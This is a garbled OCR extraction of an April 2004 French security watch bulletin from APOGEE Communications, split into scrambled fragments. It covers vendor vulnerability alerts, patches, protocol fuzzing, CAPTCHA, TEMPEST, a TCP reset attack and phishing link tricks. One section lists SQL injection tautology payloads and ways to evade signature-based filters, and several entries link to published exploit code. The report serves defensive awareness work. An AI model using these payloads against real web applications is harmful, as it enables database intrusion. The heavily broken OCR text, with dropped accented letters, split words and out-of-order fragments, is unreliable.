79. e com fr 91940 Les ULIS APOGEE Communications Tous droits r serv s Avril 2004 Au sommaire de ce rapport PRODUITS ET TECHNOLOGI ES 6 LES PRODUITS 6 VALIDATION 6 CODENOMICON TEST TOOLS 6 LES TECHNOLOGIES 8 CLASSIFI CATI ON 8 CAPTCHA UNE APPLICATION DU TEST DE TURING 8 COMPROMISSI ON ELECTROMAGN TI QUE 9 LE RETOUR DE TEMPEST 9 I NFORMATI ONS ET L GISLATION 13 LES NFORMATI ONS 13 M THODES 13 DCSSI M THODE PSSI 13 DCSSI GUIDE TDBSSI 15 NIST ETAT DES GUIDES DE LA S RIE SP800 17 VERS ET VIRUS 17 UNIRAS CODE MALICIEUX 17 LA L GISLATION 19 NTERNET 19 GOUVERNANCE DE L INTERNET 19 LOGICIELS LIBRES 22 LES SERVICES DE BASE 2 2 LES OUTILS 22 NORMES ET STANDARDS 24 LES PUBLICATIONS DEL I 24 LES RFC 24 LES DRAFTS 24 NOS COMMENTAIRES 28 LES RFC 28 RFC 3766 BCP 00086 28 LES DRAFTS 29 DRAFT IETF TCPM TCPSECURE 29 DRAFT IETF INCH IMPLEMENT 30 ALERTES ET ATTAQUES 32 ALERTES 32 GUIDE DE LECTURE 32 FORMAT DE LA PR SENTATION 33 SYNTH SE MENSUELLE 33 ALERTES D TAILL ES 34 AVIS OFFICIELS 34 BEA 34 CHECK POI NT 34 CI SCO 34 CI TRI X 35 CVS 35 F SECURE 35 FREEBSD 35 HEI MDAL 35 HP 36 I BM 36 INTEL 36 INTERCHANGE 36 LI NUX 36 LI NUX DEBI AN 37 LI NUX FEDORA 38 LI NUX REDHAT 38 LI NUX SuSE 38 MACROMEDI A 38 MI CROSOFT 38 Veille Technologique S curit N 69 Page 2 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abon
80. e consiste ins rer un ensemble de balises particuli rement bien choisies dans le champ de texte associ la balise lt A gt Anchor normalement r serv e au texte d crivant le lien Utilisation classique Utilisation classique A HREF http www site fr index html Texte d information lt A gt Microsoft Internet Explorer Texte d information http e sike Fr Index html I ka Foste de travail 2 Le texte associ la balise est ici affich sous la forme d un lien actif l URL associ e tant rappel e dans la barre d tat L activation du r f renc Avec un peu d habitude la supercherie peut ais ment tre d masqu e en visualisant le source associ celui pouvant n anmoins tre complexifi l extr me obscurci dans le jargon pour d courager les tentatives d analyse Ce proc d ne se pr te cependant pas tous les cas de figures surtout s il doit tre appliqu sur le clone d un site tiers lien conduit videmment sur le site A HREF http www site1 fr index html gt FORM action http www site2 fr index html method GET gt lt INPUT value http www sitel fr index html type SUBMIT gt lt A gt Microsoft Internet Explorer E x Sitel fr index html Paste de travail 7 http van gite html E Pi en Dans le cas pr sent le texte associ prend obligatoirement la forme d une URL r f ren ant un site tiers URL r
81. e dans Sun Solaris peut entrainer un d ni de service du syst me Forte 23 04 Sun Solaris 8 et 9 Sparc et x86 O Non journalisation des adresses IP par le d mon SSH Le d mon SSH ne journalise pas les adresses IP des syst mes clients Faible 07 04 Sun Solaris 9 Sparc et Intel Correctif existant D mon SSH Mauvaise journalisation des adresses IP Sun 57538 http sunsolve sun com pub cgi retrieve pl doc fsalert 57538 D ni de service des connexions TCP De nombreuses impl mentations du protocole TCP sont potentiellement vuln rables une nouvelle classe d attaque en d ni de service Critique 20 04 Impl mentations du protocole TCP dont les dispositifs Cisco Check Point Cray InterNiche Juniper Palliatif propos Protocole TCP Effet de bord dans le protocole AT 2004 0003 http www jpcert or jp at 2004 at040003 txt Veille Technologique S curit N 69 Page 40 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 ALERTES NON CONFIRMEES Les alertes pr sent es dans les tables de synth se suivantes ont t publi es dans diverses listes d information mais n ont pas encore fait l objet d une annonce ou d un correctif de la part de l diteur Ces alertes n cessitent la mise en place d un processus de suivi et d observation PRE g
82. e r f rentiel directement utilisable par PIX Transcription de la vocalisation d un mot ou d une s quence num rique apr s que celle ci ait t d form e au moyen de filtres sp cifiques est int ressant de constater que la validit de ces proc d s est intimement li e l incapacit actuelle de la machine dupliquer le raisonnement humain dans sa globalit et sa complexit Dans les ann es 1950 Alan Turing formulait son c l bre crit re de d cision dit test de Turing permettant de d terminer si un tiers interlocuteur est un tre humain ou une machine Le principe est simple l exp rimentateur pose diverses questions par l interm diaire de deux terminaux l un reli un tre humain l autre au syst me tester Le syst me est consid r comme intelligent si l exp rimentateur n a pu distinguer l tre humain du syst me test Nous conclurons en mentionnant la g niale technique de contournement utilis e par certains petits malins essentiellement des spammers d tenteurs de sites pornographiques d sireux de pouvoir enregistrer des milliers d adresses de messagerie forts utiles pour leur commerce mais ne souhaitant pas non plus passer des heures enregistrer manuellement celles ci partir de formulaires prot g s par un proc d de type CAPTCHA Qu cela ne tienne il leur suffit de capter leur profit la capacit d analyse des nombreux visiteurs des sites qu ils g rent en recopiant en
83. e vuln rabilit affecte les produits ISS Blackl CE entrainant une r duction du niveau de protection du Moyenne 27 03 ISS BlackICE Server Protection versions 3 5 cdf 3 6 cbr PC Protection versions 3 6 cbz 3 6 ccg mm KAME Critique 08 04 Racoon FreeBSD 4 9 avec Racoon Linux ipsec tools version 0 2 4 et inf rieures Ralf Spennebero http www securityfocus com archive 1 359749 CAN 2004 0155 D ni de service distant dans Racoon Racoon est vuln rable un d ni de service distant lors du traitement des des ent tes ISAKMP sp cialement construites Forte 19 04 Kame Racoon avec isakmp c version 1 180 et inf rieures Correctif existant Traitement des ent tes ISAKMP Non validation des valeurs soumises par l utilisateur VuXML http www vuxml org freebsd ccd698df 8e20 11d8 90d1 0020ed76ef5a html CAN 2004 0403 D ni de service dans Kerio Personal Firewall Un d ni de service affecte Kerio Personal Firewall lors du traitement d une URL malform e Moyenne 07 04 Kerio Personal Firewall 4 0 13 et inf rieures Aucun correctif web filter Mauvaise gestion des URLs malform es http www cipher org uk index php p cipher advisories cipher http www securityfocus com archive 1 359774 Une erreur de conception dans la gestion des signaux peut entra ner un d ni de service dans les noyaux 2 4 et 2 6 Forte 12 04 Linux noyau 2 4 23 2 4 25 Linux noyau 264 y Forte 23
84. ealPlayer 10 Beta anglais seulement RealPlayer Enterprise toutes versions Correctif existant Plug in de lecture des R3T D bordement de buffer NISR17042004 http www nextgenss com advisories realr3t txt RN 040406 r3t http www service real com help fag security 040406 r3t en ls aP Forte 05 04 SG IRIX versions 65 20 6 523 _ 20040401 01 P http www auscert org au render html it23988 amp cid 1 Une vuln rabilit non document e dans Solaris peut autoriser un utilisateur local provoquer un d ni de service Forte 22 04 Sun Solaris 8 et 9 Sparc et x86 O D ni de service dans Sun Cluster Un conflit d acc s dans Sun Cluster permet de provoquer un d ni de service Forte 08 04 Sun Cluster 3 0 3 1 pour Solaris 8 et 9 Sparc Correctif existant Sun Cluster Conflit d acc s Sun 57502 http sunsolve sun com pub cgi retrieve pl doc fsalert 57502 D ni de service dans les serveurs Sun Fire et Sun Netra La r ception d un paquet IP peut entra ner un d ni de service dans les serveurs Sun Fire et Sun Netra 19 04 Sun Fire v1280 et Sun Netra 1280 avec les firmwares versions 5 13 0015 et inf rieures Sun Fire 3800 4800 4810 et 6800 avec les firmwares versions 5 11 5 13 5 14 5 et 5 15 0 Correctif existant Sun Fire et Sun Netra Non disponible Sun 57544 http sunsolve sun com pub cgi retrieve pl doc fsalert 57544 Une vuln rabilit non document
85. ec IIS 5 0 mais d autres applications utilisant SSL sont potentiellement vuln rables Le second permet d acqu rir localement des droits privil gi s en exploitant une faille dans Utility Manager http lists netsys com pipermail full disclosure 2004 April 020082 html http lists netsys com pipermail full disclosure 2004 April 020179 html http lists netsys com pipermail full disclosure 2004 April 020399 html CAN 2003 0908 CAN 2004 0120 Code d exploitation pour une vuln rabilit MS04 011 Un nouveau code d exploitation pour une troisi me vuln rabilit d crite dans le bulletin Microsoft MS04 011 a t publi e II exploite un d bordement de buffer dans la biblioth que Isasrv dll de Windows et autorise un utilisateur distant ex cuter un code arbitraire http www k otik com exploits 04252004 ms040111sass c php Un code exploitant une faille dans les impl mentations TCP a t publi II s agit d un code g n rique permettant de provoquer l arr t d une connexion TCP Ce nouveau type d attaque est d crit dans les documents suivants http www osvdb org reference Slippingl nTheWindow v1 0 doc Code d exploitation pour Tcpdump Un code d exploitation permettant de provoquer un d ni de service l aide de paquets ISAKMP dans Tcpdump a t oubli Tcpdump http www k otik com exploits 04 05 tcpdump isakmp id uflow c php ANT D ww dim Code d exploitation pour la vuln rabilit
86. ee86 pour HP UX B 11 00 B 11 04 B 11 11 B 11 22 et B 11 23 Ils corrigent de multiples vuln rabilit s dont deux d bordements de buffer pouvant tre exploit s par un utilisateur malveillant afin d acqu rir des droits privil gi s http wwwd4 itrc hp com service cki docDisplay do docl d HPSBUX01018 CAN 2004 0083 CAN 2004 0084 CAN 2004 0106 Correctifs dtlogin HP a annonc la disponibilit des correctifs pour dtlogin pour HP Tru64 UNIX 4 0F PK8 4 0G PK4 5 1A PK6 5 1B PK2 et 5 1B PK3 corrigeant une vuln rabilit autorisant l ex cution de code arbitraire http wwwb itrc hp com service cki docDisplay do docl dZHPSBTUO1017 CAN 2004 0368 Correctifs pour le serveur Web Apache HP a annonc la disponibilit des correctifs pour le serveur Web Apache sur les plates formes HP HP UX B 11 00 B 11 11 B 11 22 et B 11 23 Ils corrigent de multiples vuln rabilit s pouvant entra ner un d ni de service distant http wwwd4A itrc hp com service cki docDisplay do docl d HPSBUX01022 CAN 2003 0020 CAN 2004 0113 CAN 2004 0174 Correctif Apache OpenSSL HP a annonc la disponibilit d un correctif Apache corrigeant deux vuln rabilit s dans OpenSSL qui peuvent entrainer un d ni de service distant http wwwA4 itrc hp com service cki docDisplay do docl d HPSBUX01019 CAN 2004 0079 CAN 2004 0112 Correctifs RPC HP a annonc la disponibilit s des correctifs RPC pour les plates formes HP HP UX B 11 00 B 11 11 B 11
87. eille Technologique S curit N 69 Page 21 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 LOGICIELS LIBRES LES SERVICES DE BASE Les derni res versions des services de base sont rappel es dans les tableaux suivants Nous conseillons d assurer rapidement la mise jour de ces versions apr s qualification pr alable sur une plate forme d di e diet E de Nom DNS 23 10 03 http www isc org 25 01 04 DHCP Serveur d adresse 3 0p2 15 01 03 http www isc org h NTP4 15 10 03 http www ntp org downloads html WU FTP Serveur de fichiers 2 6 2p 28 08 03 fhttp www wu ftpd org IMAP4 courrier 2002 09 09 03 fftp ftp cac washington edu imap POP3 Relev courrier 4 0 5 13 03 03 fftp ftp qualcomm com eudora servers unix popper SENDMAIL Serveur de courrier 8 12 11 18 01 04 fftp ftp sendmail org pub sendmail RELEASE_ NOTES pese SQL 0 18 12 02 04 SQUID Cache WEB 01 03 04 http www squid cache org Nor Sour INN Gestion des news 2 4 1 07 01 04 fhttp www isc org 7 OpenLDAP Gestion de l annuaire 2 2 9 15 04 04 ftp org pub OpenLDAP openldap release LES OUTILS Une liste non exhaustive des produits et logiciels de s curit du domaine public est propos e dans les tableaux suivants LANGAGES E a Non PLINT Analyse d
88. elle de la validation par injection de fautes sur une entit CODENOMICON impl mentant le protocole cible entit consid r e comme tant une boite noire L approche bo te noire permet de se focaliser sur le comportement de l entit face des sollicitations inattendues sans tre perturb par les pr jug s g n ralement induits par la connaissance de la constitution et de la nature technique de la dite entit Le projet PROTOS s int resse prioritairement la validation de la bonne impl mentation d un protocole de communication sur un quelconque syst me en insistant plus particuli rement sur la r silience de cette impl mentation face des l ments protocolaires non conformes aux sp cifications Les proc d s mis en oeuvre n ont donc pas pour objectif de valider le protocole de communication proprement dit ni m me la conformit de l impl mentation de celui ci quand bien m me les r sultats des tests effectu s sur l entit cible pourraient mettre en vidence une limitation fonctionnelle ou technique du protocole Appliqu des protocoles de communication le terme validation peut avoir en effet plusieurs significations e Validation du protocole Cette d finition fait r f rence l tape accompagnant la phase de sp cification du protocole Cette tape a pour objectif de v rifier que le protocole offre toute les qualit s l mentaires attendues d un m canisme d change de donn es Elle conduit v
89. emi re approche Cette impression de simplicit disparait tr s rapidement lorsque l on se penche sur l impl mentation des traitements clients et serveurs les m canismes mis en oeuvre devenant rapidement inextricables dans certaines situations On en prendra pour preuve la difficult de lecture d un mod le XML complexe faisant appel de multiples objets dans de multiples Namespaces D aucuns pr tendront qu il ne s agit que d un probl me de mod lisation les outils ad hoc n tant pas encore au niveau des outils livr s avec les ateliers de d veloppement classiques C est un fait mais il n explique pas tout et le succ s rencontr par le langage XML d montre que celui ci r pond bien un besoin changer des informations structur es simplement et en toute libert En toute libert c est bien l le fond du probl me et l origine des milles et un maux qui affectent les applications WEB et plus particuli rement certains navigateurs Libert de traverser les quipements de filtrage pour le protocole HTTP dont on devra se contenter de contr ler la validit de certains attributs si l on souhaite conserver les performances inh rentes la simplicit du protocole Libert d ordonnancer comme bon le semble les balises du langage HTML au risque par exemple d encourir les pires peines du monde charger un document cons quent et constitu d un unique tableau la pr sentation de la page ne pouvant tre d
90. endue puisqu elle retournera la liste des num ros de t l phone pour lesquels l expression conditionnelle est vraie c est dire la liste de tous les num ros de t l phone contenus dans la table Users Il est vraisemblable que les outils d analyse utilisant un m canisme de recherche de signature bloqueront ce type de requ te avant qu elle ne soit transmise la base Mais ceux ci seront ils apte d tecter toutes les variations syntaxiques de l expression passe partout dont quelques exemples extraits de l tude sont propos s ci dessous OR Test Test OR Test N Test OR Test Te st Test LIKE Te96 OR IN Test OR Test BETWEEN S AND U 2 Variations autour de la notion de s parateurs et de commentaires Le caract re espace est usuellement utilis pour s parer les diff rents l ments syntaxiques d une requ te L utilisation d un s parateur n est cependant pas toujours requise avec certains interpr teurs SQL dont MS SQL Dans ces environnements la s quence passe partout pr c dente peut en cons quence tre r crite sous la forme susceptible de ne pas tre d tect e par certains syst mes d analyse se basant sur la pr sence d un caract re de s paration pour interpr ter correctement les requ tes La s quence qui permet d ins rer un commentaire en fin de requ te est fort utile pour chapper tout ou partie d une clause SQ
91. er galement la culture avec les probl mes de la diversit linguistique et culturelle dans un Internet s exprimant avant tout en langue romane et influenc par la culture anglo saxonne Economiques ensuite car Internet est un vecteur de services valeur ajout e qui peuvent tre une source de prosp rit conomique Il induit galement des facteurs cl s de comp titivit en facilitant la gestion de l Information au sein et entre les organisations Politiques enfin car la poursuite du d veloppement de l Internet n cessite l intervention des institutions gouvernementales et de la soci t civile dans de nombreux domaines est devenu n cessaire de fixer des bornes juridiques et thiques au moyen d une r glementation voire d une l gislation adapt e La d finition de ces bornes est d autant plus d licate que les contours de l Internet transcendent les limites des tats nations Pour autant virtuelle que soit cette nouvelle forme de soci t et bien que l esprit communautaire libre y tienne encore mais pour combien de temps encore une place de choix dans le partage de la production intellectuelle force est de constater que son d veloppement r pond lui une logique h las purement financi re 11 ne faut en effet pas oublier que l Internet s appuie sur une infrastructure et des technologies dont les co ts de d veloppement de mise en oeuvre et donc d amortissement tiennent l cart bon nombre d industries des
92. ess 6 0 sur Microsoft Windows XP et 2003 Outlook Express Mauvaise gestion des fichiers EML sp cialement contruits http www securityfocus com archive 1 360147 McAFEE Acc s au syst me client via l ActiveX McAfee VirusScan Le contr le ActiveX McAfee VirusScan permet d acc der au syst me client via une page web malicieuse Forte 27 04 McAfee VirusScan contr le ActiveX Aucun correctif ActiveX McAfee VirusScan Acc s non autoris au contr le Securitv Tracker http www securitytracker com alerts 2004 Apr 1009956 html Exposition d information et d ni de service Un contr le ActiveX install par FreeScan permet d exposer des informations ou de provoquer un d ni de service Moyenne 07 04 McAfee FreeScan contr le ActiveX Aucun correctif Biblioth que mcfscan dll Acc s une fonction non s curis Erreur d allocation m moire Rafel I vai 54 http theinsider deep ice com texts advisory54 txt NEGGIIG NESSUS Vuln rabilit dans les outils de sondage Nessus et NeWT Une vuln rabilit dans les outils de sondage Nessus et NeWT peut entrainer l exposition d informations sensibles Moyenne 29 03 Nessus version 2 0 10a NessusWX version 1 4 4 Tenable NeWT version 1 4 et inf rieure Correctif existant Nessus NessusWX NeWT Non chiffrement des fichiers de configuration Do Rttp lists netsys com pipermail full disclosure 2004 March 019434 html Full Disclosure http lists netsys co
93. freebsd org pub FreeBSD CERT advisories FreeBSD SA 04 06 ipv6 asc CAN 2004 0370 HEI MDAL Erreur de validation dans les requ tes entre royaumes Une erreur de validation dans les requ tes entre royaumes permet de se faire passer pour un utilisateur tiers Forte 01 04 Heimdal Kerberos versions inf rieures 0 6 1 et 0 5 3 Correctif existant Heimdal Kerberos Vuln rabilit de type cross realm Heimdal 04 04 01 http www pdc kth se heimdal advisory 2004 04 01 CAN 2004 0371 Veille Technologique S curit N 69 Page 35 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Acc s non autoris sur OpenView Une vuln rabilit dans OpenView permet d obtenir un acc s non autoris Forte 06 04 HP OpenView Operations version 7 x pour HP UX et Solaris VantagePoint version 6 x pour HP UX et Solaris Correctif existant Non v rification dans les droits HPSBMAO1010 http wwwb itrc hp com service cki docDisplay do docl dZHPSBMAO1010 Forte 08 04 HP Tru64 UNIX versions 5 1A et 5 1B avec WU FTPD version 2 6 2 livr avec Internet Express X 62 Correctif existant HPSBTUO1012 http wwwb itrc hp com service cki docDisplay do docl dZHPSBTUO1012 CAN 2004 0148 CAN 2004 0185 Forte 27 04 HP Web etAdmin version 6 5 Web JetAdmin verson 6 2 t7 Aucun correctif HP Web JetAdmin Multiples probl
94. g n rales pointeurs sur les sites sp cifiques Notifications d taill es et correctifs techniques L analyse des avis peut tre ainsi men e selon les trois strat gies suivantes Recherche d informations g n rales et de tendances Lecture des avis du CERT et du CIAC Maintenance des syst mes Lecture des avis constructeurs associ s Compr hension et anticipation des menaces Lecture des avis des groupes ind pendants CERT Um Veille Technologique S curit N 69 Page 32 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 ee FORMAT DE LA PRESENTATI ON Les alertes et informations sont pr sent es class es par sources puis par niveau de gravit sous la forme de tableaux r capitulatifs constitu s comme suit Pr sentation des Alertes TI TRE Description sommaire Gravit Date Informations concernant la plate forme impact e Correction Produit vis par la vuln rabilit Description rapide de la source du probl me R f rence URL pointant sur la source la plus pertinente R f rence s CVE si d finie s Pr sentation des Informations TITRE Description sommaire URL pointant sur la source d information R f rence s CVE si d finie s SYNTHESE MENSUELLE Le tableau suivant propose un r capitulatif du nombre d avis publi s pour la p riode courante l ann e en cours
95. iaire de l application commun ment appel e navigateur Acc s une page par le biais du protocole http http site chemin d acces a la page html Acc s une ressource par le biais du protocole ftp ftp usr pass site chemin d acces a la page html Acc s une groupe de discussion sur les news news serveur nom du groupe Acc s une fichier sur le r seau local file serveur chemin d acces au fichier Bien que majoritairement utilis es avec les deux premi res formes d URI les applications de navigation actuelles sont infiniment plus complexes que les toutes premi res versions qui n taient destin es qu g rer l acc s aux pages et pr senter statiquement celles ci Les navigateurs r cents sont ainsi susceptibles de reconnaitre et de g rer plusieurs dizaines de sch mas classiques ou propri taires et d activer le gestionnaire associ si besoin En environnement Internet Explorer le sch ma news sera trait non pas par le navigateur mais par une application externe Outlook Express par d faut tout comme le sera le sch ma mailto Le traitement du sch ma file sera lui d l gu l application File Explorer Page 58 64 Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 ce i Cette logique conduit devoir scheme scheme specific parts envisager qu il puisse exister une multitude de sch mas activables directement ou indirectement cd
96. icrosoft a publi une note au sujet du d bordement de buffer dans le protocole Private Communications Transport PCT Un utilisateur distant mal intentionn peut exploiter cette vuln rabilit afin d ex cuter du code arbitraire Microsoft annonce qu un code exploitant cette faille est disponible et propose une parade consistant d sactiver PCT 1 0 SSL 2 0 ou SSL 3 0 sur Microsoft IIS http www microsoft com security incident pctdisable asp http support microsoft com default aspx scid kb en us 187498 CAN 2003 0719 Veille Technologique S curit N 69 Page 51 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Novell a annonc la disponibilit de BorderManager ICSA Compliance Kit version 5 0b Cette version beta supprime certains fichiers livr s avec iManager et met jour le module SCRSAVER NLM pour tre conforme aux derni res versions du syst me d exploitation http support novell com cgi bin search tidfinder 2968713 DEDI m SAY Vuln rabilit dans la fonction win32 stat de Perl Larry Wall Perl version 5 8 3 et inf rieures en environnement Windows sont aussi vuln rables un d bordement de buffer distant dans la fonction win32 stat pouvant conduire l ex cution d un code arbitraire http xforce iss net xforce xfdb 15732 e P ve m SCO a annonc la disponi
97. iming 3 2 Analog video signal spectra 3 3 Eavesdropping demonstration 3 3 1 Realtime monitoring 3 3 2 Experimental setup 3 3 3 Results 3 4 Radio character recognition 3 5 Hidden transmission via dither patterns 3 6 Filtered fonts as a software protection 4 Digital video displays 4 1 Case study Laptop display 4 2 Case study Digital Visual Interface 5 Emission limits 5 1 Existing public standards 5 1 1 Ergonomic standards 5 1 2 Radio frequency interference standards 5 2 Considerations for emission security limits 5 2 1 Radio noise 5 2 2 Radio signal attenuation 5 2 3 Power line noise and attenuation 5 2 4 Antenna gain 5 2 5 Processing gain 5 3 Suggested emission limits 6 Optical eavesdropping of displays 6 1 Projective observation with telescopes 6 2 Time domain observation of diffuse CRT light 6 3 Characterization of phosphor decay times 6 3 1 Instrumentation 6 3 2 Measurement method 6 3 3 Results 6 4 Optical eavesdropping demonstration 6 5 Threat analysis 6 5 1 Direct observation 6 5 2 Indirect observation Veille Technologique S curit N 69 Page 11 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Apogi 6 5 3 Observation of LEDs 6 6 Receiver design considerations 6 7 Countermeasures 7 Review outlook and conclusions A Electromagnetic fields A 1 Maxwell s equations A 2 Quantities and units A 3 Electromagnetic emanati
98. ineering AL6 Rigorous security engineering AL7 Verified rigorous security engineering AL8 Formal methods AL9 Verified formal methods L approche retenue par le projet PROTOS n est donc pas inint ressante et les r sultats d j obtenus prouvent son efficacit relative Que l on en juge sur pi ce P riode Protocole Requ tes WSP Protocole WAP Conclusion Application d un jeu de 4236 requ tes diff rentes Mise en vidence de multiples anomalies exploitables pour provoquer au mieux un d ni de service 23 passerelles WAP R ponses HTTP 24 navigateurs autonomes ou int gr s des PDA Application d un jeu de 3966 r ponses diff rentes Mise en vidence de multiples anomalies pouvant provoquer au mieux un d ni de service voire l ex cution d un code malicieux sur deux des navigateurs Requ tes LDAP Encodage 5 1 Format BER Syntaxe WMLC Syntaxe SNMP 23 serveurs LDAP 24 navigateurs ind pendants ou int gr s des t l phones I mpl mentations SNMPVT1 diverses non d taill Application d un jeu de 12649 requ tes diff rentes Mise en vidence de multiples anomalies provoquant au mieux un d ni de service voire l ex cution d un code malicieux sur quatre serveurs Application d un jeu de 1033 formes syntaxiques Mise en vidence de multiples anomalies dont certaines autorisent le transfert et l ex cution d un code malicieux Application d un jeu de
99. information tue l information n tant pas valable dans le domaine de la s curit sauf consid rer mettre en place un syst me de d sinformation la description de la cause d erreur g n r e par le script associ au formulaire ou par le processus d assemblage en principe le gestionnaire d interface SQL devra tre r duite au strict minimum voire ne jamais tre transmise Dans article publi en septembre 2003 sous le titre Blind SQL Injection un expert de la soci t SpyDynamics d montrait que cette protection l mentaire tait insuffisante dans la majorit des cas et qu il tait parfaitement possible d engager avec succ s une attaque en aveugle c est dire sur un syst me ne retournant aucune erreur L tude publi e par la soci t Imperva s int resse aux proc d s permettant de contourner les techniques de protection par recherche de signatures c est dire de la pr sence de motifs repr sentatifs d une attaque dans les commandes soumises aux serveurs WEB Ainsi et titre d exemple un syst me de protection par recherche de signature normalement constitu aurait d tect la pr sence de la cha ne OR dans la commande transmise au serveur WEB la suite de la saisie du formulaire Une telle chaine et ses multiples variations forme une signature id ale voire m me trop parfaite d une attaque la probabilit que cette chaine soit significative d une saisie valide dans un champ de formulai
100. insi t mises au point depuis plusieurs ann es dans l optique d aider discerner un acc dant humain d un acc s effectu par un syst me automatis Si les m thodes d authentification classiques peuvent bien entendu convenir dans le cas de sites priv s elles ne permettront pas de r soudre la probl matique du contr le d acc s un site publique acc d par des utilisateurs anonymes Les seules m thodes exploitables dans ces conditions devront faire appel une nouvelle classe de probl mes bas e non plus sur la connaissance d un secret mais sur la capacit de l esprit humain r soudre une s rie de d fi plus rapidement que ne le ferait un programme si tant est qu un tel programme existe Cette classe de probl mes est d sormais d sign e par le terme CAPTCHA sigle de Completely Automated Public Turing test to Tell Computers and Humans Apart En 2000 le fournisseur Yahoo mettait en place un syst me de ce type d nomm Gimpy pour prot ger l acc s au formulaire de cr ation de compte de messagerie et ainsi mettre un terme la cr ation automatique de comptes ensuite utilis s pour v hiculer des messages non sollicit s Res NU ds i Le proc d utilis a t d velopp par le laboratoire de recherche de l universit 5 tA SVT uma 2S de Carnegie Mellon consiste demander l utilisateur la saisie d un mot AM al atoire pr sent d form dans un environnement bruit sous la forme d une
101. ion Technology Systems 06 2003 SP800 40 Applying Security Patches O O SP800 42 Guidelines on Network Security testing SP800 43 System Administration Guidance for Windows2000 R 01 2002 SP800 46 Security for Telecommuting and Broadband Communications M P800 47 SP800 48 Wireless Network Security 802 11 Bluetooth and Handheld Devices R 07 2002 SP800 50 Building an Information Technology Security Awareness amp Training Program Mi F P800 53 Minimum Security Controls For Federal Information Technology Systems D P800 53a Techniques amp Procedures for the verification of Security Controls in Fed ITS D SP800 55 Security Metrics Guide for Information Technology Systems F 07 2003 P800 56 Recommendation on Key Establishment Schemes 01 2003 D P800 57 Recommendation on Key Management D 01 2003 P800 59 Guideline for Identifying an Information System as a National Security System F 08 2003 P800 61 omputer Security Incident Handling Guide F 01 2004 SP800 60 Guide for Mapping Types of Information amp Information Systems to Security Categories R 03 2004 SP800 63 Recommendation for Electronic Authentication RR 01 2004 5 800 Recommended Common Criteria Assurance Levels D 02 2004 ISP800 67 Recommendation for the Triple Data Encryption Algorithm TDEA Block Cipher D 04 2004 F Finalis
102. ition de r soudre un probl me classique celui de la d termination de la taille optimale des clefs employ es dans les algorithmes clefs publiques notamment lorsque ceux ci sont utilis s dans une op ration de mise la clef La robustesse d un protocole cryptographique et donc sa r sistance aux attaques de toute nature d coule de la combinaison de la robustesse de l algorithme de mise la clef et de celle de l algorithme de chiffrement c est dire plus ou moins directement de la taille des clefs utilis es S il est ais d envisager la robustesse d un algorithme de chiffrement sym trique comme une fonction simple de la taille de la clef utilis e le probl me est plus ardu dans le cas d un algorithme de chiffrement asym trique II est pourtant primordial de dimensionner correctement les clefs prot geant l op ration de mise la clef L utilisation de clefs trop longues conduira consommer inutilement des ressources de calcul sans aucun gain en terme de robustesse A contrario l utilisation de clefs trop courtes cr era un point de faiblesse qui sera t t ou tard exploit par l agresseur En effet pourquoi celui ci tenterait il de d chiffrer les donn es quand il lui sera plus ais d obtenir les clefs chang es la source Pour r soudre ce probl me il est n cessaire de raisonner sur la d termination d une robustesse quivalente exprim e en bits et calcul e en r f rence aux algorithmes utilis s et aux condition
103. l mes d am lioration des performances les concepteurs du protocole TCP ont retenu une logique de gestion des acquittements consistant valider un bloc de paquets en acquittant le dernier paquet de ce bloc plut t que d acquitter unitairement chaque paquet TCP recu Dans une tude pr sent e la conf rence CanSecWest Paul Watson d montre que l extension de la condition de pr diction d un num ro de s quence unitaire celle du tirage d un num ro valide dans une suite chronologique de num ros de s quence autorise la mise en pratique d une attaque probabiliste avec un excellent taux de succ s On comprendra intuitivement que l on aura plus de chances de trouver en aveugle un num ro valide dans une suite chronologique de num ros que de trouver du premier coup un unique num ro On notera que la taille de la fen tre d acquittement la longueur de la suite peut tre param tr e sur la majorit des impl mentations de piles Il faudra cependant tenir compte de l influence de cette taille sur les performances du protocole et sur les risques associ s trop petite elle conduira g n rer un tr s grand nombre d acquittements trop grande elle augmentera le risque d une pr diction valide et la dur e de validit de cette fen tre L avis transmis par l UNIRAS contient trois recommandations destin es r duire le degr d exposition d un syst me cette nouvelle classe d attaque Utiliser autant que peut se faire le
104. l target cobalt qube3 eng amp nav patchpage http sunsolve sun com pub cgi show pl target cobalt rag4 eng amp nav patchpage http sunsolve sun com pub cgi show pl target cobalt raqxtr eng amp nav patchpage CAN 2004 0078 R vision du bulletin 57478 Sun a de nouveau r vis son bulletin 57478 pour annoncer la disponibilit du correctif final 112234 12 pour Sun Solaris 9 sur plate forme x86 http sunsolve sun com pub cgi retrieve pl doc fsalert 57478 Correctifs pour ProFTPD sur Cobalt Sun a annonc la disponibilit des correctifs pour ProFTPD pour les plate formes Sun Cobalt Qube 3 RaQ 4 RaQ 550 et RaQ XTR corrigeant ainsi un d bordement de buffer http sunsolve sun com pub cgi show pl target cobalt qube3 eng amp nav patchpage http sunsolve sun com pub cgi show pl target cobalt raq4 eng amp nav patchpage http sunsolve sun com pub cgi show pl target cobalt raq550 eng amp nav patchpage http sunsolve sun com pub cgi show pl target cobalt raqxtr eng amp nav patchpage CAN 2003 0831 R vision du bulletin Sun 57524 Sun a r vis son bulletin Sun 57524 pour annoncer la vuln rabilit des cartes acc l ratrices Sun Crypto Accelerator 500 1000 v1 0 1000 v1 1 et 4000 v1 0 aux r centes failles d couvertes dans OpenSSL 11 n y a pas de correctif disponible http sunsolve sun com pub cgi retrieve pl doc fsalert 57524 CAN 2004 0079 CAN 2004 0081 CAN 2004 0112 Veille Technologique S curit N 69 Page 52 64
